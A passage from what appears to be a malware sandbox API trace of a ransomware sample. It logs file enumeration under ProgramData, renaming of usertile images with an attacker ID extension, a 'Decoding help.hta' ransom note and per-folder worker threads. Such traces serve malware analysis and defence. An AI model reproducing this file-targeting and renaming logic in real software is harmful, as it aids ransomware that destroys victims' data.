Account Pictures\\Default Pictures\\*.*") returned 71 [0054.003] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile39.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" [0054.003] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" [0054.003] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0054.003] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.003] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae607689, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae607689, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc50c9f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile40.bmp", cAlternateFileName="")) returned 1 [0054.003] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.003] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.003] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0054.003] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0054.004] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile40.bmp") returned -1 [0054.004] lstrlenW (lpString="usertile40.bmp") returned 14 [0054.004] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.004] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.004] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile40.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" [0054.004] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" [0054.004] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0054.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile40.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.004] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae62d7e6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae62d7e6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddcc30b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile41.bmp", cAlternateFileName="")) returned 1 [0054.004] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.004] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.004] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0054.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0054.004] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile41.bmp") returned -1 [0054.004] lstrlenW (lpString="usertile41.bmp") returned 14 [0054.004] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.004] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.004] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile41.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" [0054.004] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" [0054.004] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0054.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile41.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.005] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddce9217, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile42.bmp", cAlternateFileName="")) returned 1 [0054.005] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.005] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.005] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0054.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0054.005] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile42.bmp") returned -1 [0054.005] lstrlenW (lpString="usertile42.bmp") returned 14 [0054.005] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.005] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.005] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile42.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" [0054.005] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" [0054.005] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0054.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile42.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.005] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd0f375, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile43.bmp", cAlternateFileName="")) returned 1 [0054.005] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.005] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.005] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0054.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0054.006] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile43.bmp") returned -1 [0054.006] lstrlenW (lpString="usertile43.bmp") returned 14 [0054.006] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.006] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.006] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile43.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" [0054.006] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" [0054.006] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0054.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile43.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.006] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd354d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 1 [0054.006] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.006] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.006] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0054.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0054.006] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile44.bmp") returned -1 [0054.006] lstrlenW (lpString="usertile44.bmp") returned 14 [0054.006] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0054.006] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0054.006] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile44.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" [0054.006] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" [0054.006] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0054.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.007] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd354d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 0 [0054.007] FindClose (in: hFindFile=0x671170 | out: hFindFile=0x671170) returned 1 Thread: id = 555 os_tid = 0xcf0 [0048.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*", lpFindFileData=0xf70fd30 | out: lpFindFileData=0xf70fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6711f0 [0048.400] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.400] FindNextFileW (in: hFindFile=0x6711f0, lpFindFileData=0xf70fd30 | out: lpFindFileData=0xf70fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.400] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.400] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.400] FindNextFileW (in: hFindFile=0x6711f0, lpFindFileData=0xf70fd30 | out: lpFindFileData=0xf70fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0048.400] lstrcmpW (lpString1=".", lpString2="Applications") returned -1 [0048.400] lstrcmpW (lpString1="..", lpString2="Applications") returned -1 [0048.400] lstrcmpiW (lpString1="windows", lpString2="Applications") returned 1 [0048.403] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*" [0048.403] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*") returned 44 [0048.403] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\", lpString2="Applications" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications" [0048.403] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*.*" [0048.403] GlobalMemoryStatus (in: lpBuffer=0xf70fd10 | out: lpBuffer=0xf70fd10) [0048.403] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x245d9130, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x614 [0048.421] CloseHandle (hObject=0x614) returned 1 [0048.421] FindNextFileW (in: hFindFile=0x6711f0, lpFindFileData=0xf70fd30 | out: lpFindFileData=0xf70fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0048.421] lstrcmpW (lpString1=".", lpString2="Temp") returned -1 [0048.421] lstrcmpW (lpString1="..", lpString2="Temp") returned -1 [0048.421] lstrcmpiW (lpString1="windows", lpString2="Temp") returned 1 [0048.421] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*" [0048.421] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*.*") returned 44 [0048.421] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\", lpString2="Temp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp" [0048.421] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*.*" [0048.421] GlobalMemoryStatus (in: lpBuffer=0xf70fd10 | out: lpBuffer=0xf70fd10) [0048.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d6ebb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x614 [0048.430] CloseHandle (hObject=0x614) returned 1 [0048.430] FindNextFileW (in: hFindFile=0x6711f0, lpFindFileData=0xf70fd30 | out: 